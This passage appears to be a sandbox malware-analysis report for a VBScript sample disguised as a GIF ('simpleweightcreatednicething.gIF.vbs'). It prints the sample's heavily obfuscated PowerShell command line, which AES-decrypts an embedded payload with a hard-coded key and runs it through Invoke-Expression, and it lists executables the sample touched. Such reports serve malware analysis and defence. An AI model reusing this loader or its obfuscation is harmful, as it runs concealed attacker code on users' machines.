1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31288118537265901671092296545801CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI9qzw9rWNQXNXTkOMi91Vo37XNXwKsDkID6RFqNMIb+XDhn4Y5AbEg30f25b/EyGdGGjWsHDIIox1WuVuUdOUadjhme+5zvVV44oiyworfCO2lfsB1IQVwYt2W3SwF0Ux7M7imAEKs79W60z/0ynAsj8hj2vt/lnFQIiUMLXwxtg0ygxaA1q2xZSJwwSMDWyzIontKVe2xHt1HI77rYSt/VnOayqQ2yg7Mp48pY+uj2EZP74FtBnkcE9p92gZJxz+peJ+AKTzl7JeqJQuodXWFmK9sgGK4n13RybKFC+dVb8O8Krc/u05EdmP8zqWyMN4CIIIo6bc+uy3dadl98BZbD0z03uf3Oz6xO+gLfn9tOR1YKsukLXT2OScPDC2jP9f9Yqq+KSXQNHugPnILvW7k+DBL1ZjUxKLNlvCe0NOpwgh8+75a/DTYGBpNBdkSv6BeMFiZTOcAGGEAB5TlZIOZzRTBw8GIX57ryKhBD+OOgtPd2gLFQriTRl2LIoUqCZ1NdzqGQpGwwf4BXbnED2n7yIY2OKKYAovsduKNeTRlypT3jEkMxq1Z51SmOLPNtSqgYjTlhY1Pf+4wEgtf5RvJnRdkbil32H7SckZeqIf4a57uzHIqbcG+bjJT0/Q8jk0lXBCRIMGQd1Frr3sKLigZVlZV51M8hR24sv8ALa2EgO+gSMuthSXw3J2JazJgRKFhsjaMNJMFeeAuPC9u3bhyNRUUxtNbaEkf5p/2U/Td9f3luetP2LV6G1qctY5iGj1puWd+7Oa1A9Jx8sKWBfK7ssUEzfA5tRfwJs+Yig4neb6zjDL+RrpEHNFlkE8+TDOUhcNUOaaxmdagb669MaY6AUHuBGbW4T3clqQY3KqMWiWxvWFBjhAXh4oSmZFSY/+TaEY+Bjm7AbSBTspTWmyfY2HbT2L5cOwDGAAmIx3UR2NUByK70uEAvM2Yz5ioHv8hB18Qc2MMkbxqSrhFr41oRCPhdCx89cUfnKhXUDDd2TkPICClvjRXaMqZ9/NY0GbTYZhUyGeiljzB9o333Pd4tXJeCeAXf7pdSIB5lulheY+jHzCGimEp3VVl2AkjOwPbeoJhwjAUV22t+K1mLSHCLkb+kxdZ8PTVzqfErU5M/wAcukzKiEIWL67nmNrbrCQr0n4yiBww55JzH6QlqH4bo8R3wkrh+6GeX2DuozRIcrO+EJkFIyPGqzNOLbPmOMp2ywAQFZmKLtSNxMb1p4gtH1hzuGDw855hxFyyAs5y4m0NtXFrTGbDRUXgJ0rYRgPSAr/DFlNfYC4xRFI4A4HllUDOPIr2vsL8x87drooa8oqLFJuRFU8yqTyYdo3WNhu0QjHhbWlwKo+VZRctR1fsH+/yM/e99xk2kRcHOemzLzjSfiD4PKV4nvV6jwTReR+4NtyQtYW+KGUdbNqX7Wd4A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

simpleweightcreatednicething.gIF.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All